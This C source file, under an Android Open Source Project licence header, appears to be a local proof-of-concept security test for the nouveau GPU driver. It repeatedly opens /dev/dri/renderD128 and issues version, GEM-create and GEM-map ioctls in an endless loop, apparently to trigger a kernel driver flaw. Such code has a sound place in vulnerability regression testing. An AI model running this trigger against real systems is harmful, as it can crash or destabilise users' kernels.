      1 /**
      2  * Copyright (C) 2018 The Android Open Source Project
      3  *
      4  * Licensed under the Apache License, Version 2.0 (the "License");
      5  * you may not use this file except in compliance with the License.
      6  * You may obtain a copy of the License at
      7  *
      8  *      http://www.apache.org/licenses/LICENSE-2.0
      9  *
     10  * Unless required by applicable law or agreed to in writing, software
     11  * distributed under the License is distributed on an "AS IS" BASIS,
     12  * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
     13  * See the License for the specific language governing permissions and
     14  * limitations under the License.
     15  */
     16 #define _GNU_SOURCE
     17 #include "local_poc.h"
     18 #include <fcntl.h>
     19 #include <stdio.h>
     20 #include <stdlib.h>
     21 #include <string.h>
     22 #include <sys/ioctl.h>
     23 #include <sys/prctl.h>
     24 #include <sys/stat.h>
     25 #include <sys/types.h>
     26 #include <sys/wait.h>
     27 #include <unistd.h>
     28 #define DRMDEV_NAME "/dev/dri/renderD128"
     29 
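     /**
      * Query the DRM driver version on an open device node.
      *
      * Allocates three scratch buffers for the name, date and description
      * strings, issues DRM_IOCTL_VERSION, and releases the buffers again.
      * Only the success or failure of the ioctl is reported; the strings
      * themselves are never read by this file.
      *
      * @param fd  descriptor returned by open() on the DRM device.
      * @return 0 when the ioctl succeeds, -1 when an allocation or the ioctl
      *         fails.
      */
     static int drm_version(int fd)
     {
       enum { VERSION_STR_LEN = 100 };
       struct drm_version ver;
       int ret = -1;

       /* Start from a fully defined request instead of stack garbage. */
       memset(&ver, 0, sizeof(ver));
       ver.name_len = VERSION_STR_LEN;
       ver.date_len = VERSION_STR_LEN;
       ver.desc_len = VERSION_STR_LEN;

       ver.name = malloc(VERSION_STR_LEN);
       ver.date = malloc(VERSION_STR_LEN);
       ver.desc = malloc(VERSION_STR_LEN);

       /* Never hand the kernel a NULL buffer paired with a non-zero length. */
       if (ver.name != NULL && ver.date != NULL && ver.desc != NULL) {
         if (ioctl(fd, DRM_IOCTL_VERSION, &ver) != -1) {
           ret = 0;
         }
       }

       /*
        * The caller runs this in an endless loop, so the buffers must be
        * released on every path; free(NULL) is a no-op.
        */
       free(ver.name);
       free(ver.date);
       free(ver.desc);

       return ret;
     }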
     49 
     /**
      * Ask the nouveau driver for a new GEM buffer object.
      *
      * The request is zeroed, then filled with a size of 0x1000 bytes and the
      * NOUVEAU_GEM_DOMAIN_GART domain before DRM_IOCTL_NOUVEAU_GEM_NEW is issued.
      *
      * @param fd  descriptor of the open DRM device.
      * @return the handle the driver wrote into the request (converted to int),
      *         or -1 when the ioctl fails.
      */
     static int nouveau_gem_ioctl_new(int fd)
     {
       struct drm_nouveau_gem_new req;

       /* memset rather than an initializer so padding bytes are zero as well. */
       memset(&req, 0, sizeof(req));
       req.info.domain = NOUVEAU_GEM_DOMAIN_GART;
       req.info.size = 0x1000;

       if (ioctl(fd, DRM_IOCTL_NOUVEAU_GEM_NEW, &req) == -1) {
         return -1;
       }

       return req.info.handle;
     }
     67 
     /**
      * Create a GEM object and return its handle as an unsigned value.
      *
      * Thin wrapper around nouveau_gem_ioctl_new(). That function reports
      * failure as -1, which arrives here converted to uint32_t (all bits set),
      * so callers cannot tell failure apart from a handle of that value.
      *
      * @param fd  descriptor of the open DRM device.
      * @return the handle, or (uint32_t)-1 when creation failed.
      */
     static uint32_t get_gem_map_handle(int fd)
     {
       return (uint32_t)nouveau_gem_ioctl_new(fd);
     }
     76 
     /**
      * Issue one DRM_IOCTL_NOUVEAU_GEM_MAP request for a GEM handle.
      *
      * The request is zeroed and then carries the given handle and a length of
      * 0x1000. The ioctl result is discarded: the function returns nothing
      * whether the call succeeds or fails.
      *
      * @param fd      descriptor of the open DRM device.
      * @param handle  GEM handle to place in the request.
      */
     static void nouveau_gem_ioctl_map(int fd, uint32_t handle)
     {
       struct drm_nouveau_gem_map req;

       memset(&req, 0, sizeof(req));
       req.length = 0x1000;
       req.handle = handle;

       /* Outcome intentionally ignored; there is no error path to report it. */
       (void)ioctl(fd, DRM_IOCTL_NOUVEAU_GEM_MAP, &req);
     }
     90 
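     /**
      * Run one pass of the test sequence against the DRM render node.
      *
      * Opens DRMDEV_NAME read/write, queries the driver version, creates one
      * GEM object and issues the map ioctl for its handle ten times, then
      * closes the descriptor.
      *
      * @return 0 after a complete pass, -1 when the device cannot be opened or
      *         the version query fails.
      */
     int looploop()
     {
       enum { MAP_CALLS = 10 };
       int fd;

       fd = open(DRMDEV_NAME, O_RDWR);
       if (fd == -1) {
         return -1;
       }

       if (drm_version(fd) == -1) {
         /*
          * main() calls this function forever; returning without close()
          * here would leak one descriptor per pass until open() fails.
          */
         close(fd);
         return -1;
       }

       /*
        * NOTE(review): a failed creation comes back as (uint32_t)-1 and is
        * still passed to the map ioctl; that matches the original sequence
        * and is left unchanged.
        */
       uint32_t handle = get_gem_map_handle(fd);

       for (int i = 0; i < MAP_CALLS; i++) {
         nouveau_gem_ioctl_map(fd, handle);
       }

       close(fd);

       return 0;
     }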
    120 
    /**
     * Entry point: repeat looploop() without end.
     *
     * The return value of each pass is ignored and the loop has no exit
     * condition, so the process runs until it is terminated externally.
     */
    int main()
    {
      for (;;) {
        looploop();
      }
    }
    127